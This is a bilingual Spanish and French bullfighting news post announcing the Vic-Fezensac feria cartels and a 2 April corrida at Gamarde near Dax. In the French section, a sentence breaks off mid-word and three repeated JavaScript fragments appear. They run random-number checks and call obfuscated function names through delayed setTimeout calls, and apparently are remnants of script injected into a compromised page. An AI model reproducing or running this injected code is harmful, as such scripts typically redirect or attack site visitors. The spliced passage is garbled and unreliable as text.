SE LANZA LA TEMPORADA DEL SUROESTELA TEMPORADA DANS LE SUD OUEST EST LANCÉE

Se acaban de conocer los carteles de la tradicional feria de Vic-Fezensac con hierros muy del gusto del público torista que sin duda colmará la plaza el primer fin de semana de junio. Ganaderías como las de Dolores Aguirre, Palha, pero también Alcurrucén para cerrar la feria. Una corrida concurso con ejemplares de Miura, Cuadri, Cura de Valverde…, platos fuertes para toreros valientes.

Pero antes de esta cita hay otra muy interesante y próxima en el tiempo, el 2 de abril en una plaza inaugurada en el 2015, la de Gamarde, en la periferia de Dax. Contará con uno de los toreros con mas cartel hoy en día en Francia, Curro Díaz la que acompañarán la joven promesa limeña Joaquín Galdós, que triunfara la temporada pasada en la cercana plaza de Dax, y el matador de la tierra Thomas Dufau al que sus numeroso partidarios querrán en que momento se encuentra. La terna ante el ganado salmantino de José Cruz Iribarren.

gamarde1

Suite aux festivals et novilladas, voici le temps des ferias et des corridas dans le Sud Ouest. On vient de connaître les affiches de la traditionnelle feria de Vic-Fezensac, du goût bien entendu de l’aficion toriste qui remplira sans doute les gradins des arènes le premier week-end de juin. Avec des toros de Dolores Aguirre, Palha, mais aussi d’Alcurrucén pour clôturer la feria. Il y aura également une novillada et une corrida concours avec du bétail de Miura, Cuadri, Cura de Valverde…. Des plats épicés pour des toreros vaillants.

Mais avant ce rendez-vous il y en a un autre, en corrida, très intéressant et plus proche de nous dans le temps. Ce sera le 2 avril dans des arènes inaugurées en 2015, celles de Gamarde, en périphérie de Dax. Avec, à l’affiche, l’un des toreros préférés de l’aficion française, Curro Díaz, accompagné par une jeune promesse, bien connu des aficionados du temps où il était novillero et qui a triomphé la saison dernière dans les arènes de Dax, le péruvien Joaquín Galdós, et non moins intéressante la présence du torero landom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andais Thomas Dufau dont les aficionados pourront jauger ses ambitions pour cette année. Tout ceci devant des toros de l’élevage de la région de Salamanque de José Cruz Iribarren.

gamarde1

Les commentaires sont fermés.